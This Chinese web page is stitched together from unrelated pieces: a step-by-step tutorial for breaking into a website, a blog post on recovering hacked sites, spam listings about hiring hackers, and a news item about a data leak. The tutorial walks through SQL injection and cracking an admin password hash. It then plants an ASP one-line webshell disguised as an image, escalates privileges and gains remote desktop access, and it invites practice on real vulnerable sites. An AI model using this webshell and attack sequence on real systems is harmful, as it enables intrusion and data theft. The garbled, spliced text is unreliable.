下面的这些工具在黑客小密圈里面都有，如果加入小密圈了可以直接在哪里下载，如果没有加入，可以在网上找，网上也可以找到的。

　　1、找注入 爆账号

　　啊D和明小子

　　2、注入工具

　　椰树扫描、流光、Pangolin（穿山甲）、havij（胡萝卜）

　　3、找后台

　　御剑后台扫描、扫描器

　　4、传小马

　　各种一句话木马、中国菜刀、中国蚁剑

　　5、提权

　　pr提权工具、黑协提权工具

　　接下来就直接渗透一个网站案例，来演示各种工具的使用 *** ：

　　实验环境大家可以用虚拟机或者本地进行模拟操作，或者找些漏洞较多，比较垃圾的网站进行操作。

　　演示开始：

　　步骤一：找注入

　　打开浏览器，推荐用火狐浏览器或谷歌浏览器。

　　出现下图的页面，这里用ie演示。

　　IE浏览器的选项设置，新手建议全部显示反馈的错误信息，根据实际情况来，就可以准确的判断网页的信息。

　　直接用啊D注入工具和明小子配合检测使用

　　成功找到注入点，如下图：

　　步骤二：爆账号

　　右键找到的注入点——注入检测

　　点击右上角的检测开始注入检测

　　最后得到网站的某个账号，用户名：linhai ，密码：d7e15730ef9708c0

　　一般来说，数据库存放的密码应该是经过md5加密过的，不用担心，只需要用解密MD5工具一下就可以解密，百度一下，解密工具很多，这里推荐：

　　解密md5后得到的密码为：linhai19760812

　　步骤三：找后台【可以用御剑后台扫描器扫描】

　　此步骤为找到网站的管理后台。

　　接下来，访问扫描到的后台地址，登录。

　　地址：/admin/login.asp

　　直接登录网站后台，到这里，已经成功获得网站后台管理权限了。

　　步骤四：传小马

　　记住黑客入门教程里面的一句话，先传小马，再传大马，找到上传点就不会错，稳拿下。

　　由于是asp的站点，确定需要的是asp一句话木马，代码为<%eval request("x")%>，密码为x

　　网站后台的上传点可能很多，有的可行，有的不行，可以多试试，我们的目的就是通过这些上传点，把我们的木马上传到网站服务器，从而控制网站。

　　通常成功率比较高的上传点是上传图片附件，如下图：

　　做个木马，打开txt文档，写上asp一句话<%eval request("x")%>，密码是x。并且把文件类型改成图片，不要只写一行代码，不大不小，100行差不多。

　　然后上传。接下来的思路就是利用网站的数据库功能，把我们上传的文件后缀由jpg改成asp。

　　然后，就可以用菜刀，连接刚才复制到根目录的xbk.asp文件（木马）。

　　打开菜刀，在空白处右键——添加，输入木马的地址和网站。

　　步骤五：拿权限

　　接下来主要用提权三件套：cmd.exe、pr.exe、3389.bat ，把这3个工具，用菜刀上传到回收站目录下面。接下来，进入我们上传的cmd.exe虚拟终端，执行我们的提权三件套。

　　不仅仅这种 *** 可以成功，不同的思路可以转变，或许过程会很顺利，也或者防护很多，没办法顺利入侵成功。

　　执行完成后，打开远程桌面，用刚才提权的账号，进入服务器。

　　到此为止，一个完整的渗透过程结束，已经成功获得服务器的管理权限了。

　　网站被黑是站长非常不喜欢看到的事情，对网站的风险很大，不仅仅可能让自己的客户降低对我们的信任度，还可能会导致网站降权，甚至k站（搜索排名全无）。今天，错误博客（ cuowu.com ）分享的是《网站被黑客攻击怎么处理》。希望对大家有所帮助。

　　一、网站部分页面被改

　　如果网站site没有出现过多垃圾页面，只有少数已有页面被修改。

　　1、问题描述

　　如果网站site没有出现过多垃圾页面，只是首页、栏目等页面的三要素（标题、关键词、页面描述，有些修改主题部分）

　　2、问题分析

　　问题可能就是后台登陆地址和管理员账户密码泄漏。

　　3、问题处理

　　修改后台登陆地址、管理员名称和管理员密码。

　　出现这种情况可能就是黑客采用了扫后台软件找到了网站的后台登陆文件，找到这个登陆页面之后，就可以通过暴力破解的形式来获取管理员用户名和密码，如果你的管理员名字是admin，administrator，那就尽快去修改吧，不然人家只需要暴力破解就可以进入网站后台了。如果你的网站登陆页面是根目录下admin.php或者其他类似结构，那就去把这个登陆文件的名字也修改一下，不然，黑客就不用费劲地找到了你的后台登陆地址。

　　二、网站文章被批量修改

　　有一些网站后台具有模版修改功能，黑客可以利用这些模版批量修改文章标题等内容。

　　1、问题描述

　　浏览发现网站很多栏目下的文章被批量修改，标题融入了违规关键词或者其他。

　　2、问题分析

　　仅出现这种问题的话，很大概率还是网站后台账户密码被修改了。

　　3、问题处理

　　如果遇到这种问题，除了应该做之一种情况的三种修改外，还应该去修改模版文件权限，让网站后台不具备修改权限，这样就不致于整个栏目的文章一次性被修改的悲剧了。

　　三、网站违规词页面收录暴涨

　　通过查看网站综合数据，当我们看到网站收录量暴涨，并且最近收录量很高，而且都是一些违规页面。但是网站原来的页面都是很正常的。

　　1、问题描述

　　原有页面快照未被修改，只是新收录了不少页面，都是一些较为违规的关键词。

　　2、问题分析

　　这种网站被黑很可能是黑客掌握了网站的上传漏洞，通常说拿到了网站的shell权限，此时网站服务器可能已经被放置了木马，黑客通过菜刀等工具可以在网站服务器上传各种html文件，也就是那些已经被收录的静态页面。上传完成之后，再把这些链接推送到蜘蛛池等方式吸引大量蜘蛛爬行，达到快速收录的目的。

　　3、问题处理

　　这种问题需要通过找出网站的木马病毒，并且找到到底是哪里出现的问题被黑客拿到了shell权限。有可能是通过后台上传权限拿到的，那就按以上办法修复后台问题，也有可能是通过IIS等web发布中间件漏洞，那么就去修复这些，也可能是通过sql注入拿到的，那就需要修复这个问题，也可能是PHP版本漏洞出现的，那就去修复这些。

　　总之，这种被拿到shell的问题出现的原因有很多种，一般的木马用一些安全狗之类的软件就可以扫描出来。所以，这里就需要我们选择安全性比较强的服务器，比如阿里云就是不错的选择。

　　四、网站快照被劫持

　　一种非常常见的网站被黑的表现形式就是快照劫持，我们访问网站是正常的，但是从搜索引擎site看到的页面已经不是我们的标题了，针对这种情况网站大概率是被黑客拿了shell，并做了寄生虫排名。

　　1、问题描述

　　site发现很多页面的快照被改，从搜索引擎进入可能还跳转，正常在浏览器输入网址访问无任何异常。

　　2、问题分析

　　网站劫持大部分都是被拿了服务器的shell权限，要想解决这个问题，我们需要做的就是找到并清理木马文件，然后修复漏洞。

　　3、问题处理

　　这个的处理方式跟上面是一样的，利用软件找到并清理木马文件，然后找出是网站程序漏洞，还是web中间件漏洞，还是php漏洞，还是sql漏洞，还是服务器系统漏洞等。

　　除了这些之外，还可能出现的问题是，服务器根本没有任何木马，只是在网站程序中加入了从搜索引擎进入网站直接跳转的代码。这种情况，直接删掉这串代码即可。直接查找网站模板文件中的referer与user-agent，如果存在一连串的"baidu"," *** ","sogou","haosou","soso","360","so","yahoo","bing","youdao"，那基本上可以判断这段代码就是了，直接删掉即可。

　　说在最后，如果你的网站是被DDOS攻击，每天流量还特别大，想不花钱解决问题是不太可能的了，防御都特别贵，我之前一个网站200G的高防服务器根本顶不住，最后因为那个网站没什么收入，只能放弃了。想扛下来，很多都是一天几千，甚至几万元的费用，网站没有做特别暴利的项目确实扛不住。

图片查看：
查询分类：	视频软件固始
用户提问：	找黑客攻击网站
状态：	已解决
调查用时：	325小时

怎样能找到黑客帮忙

　　昨晚（6月13日）22:59，曾扬言要分阶段公开A站被泄漏用户信息的黑客，在地下论坛发帖表示：出于A站 *** 态度诚恳，以及对于二次元世界的热爱，决定无条件删除数据库。

　　在帖子中，他们还表示，从来没有把数据库出售给任何一个人，对于此前公布的300名用户的信息，他们也表示抱歉。

　　最后，他们还哭了回穷，表示从来没人光顾过这个生意，还希望有人使用ETH捐赠他们，呵呵。

　　对于昨天与A站一同出现的摩拜和12306，铁总和摩拜都已经发表官方声明，表示目前没有发现用户数据泄漏。

其他问题提问	相关问题回答
黑客在线接单 ***	运行入侵控制
黑客联系群	手机媒体留言
想找一名黑客怎么做	公司中国老婆
哪里能找到黑客高手帮忙	获取正规平台
微信电脑高手在线咨询	工作诈骗发布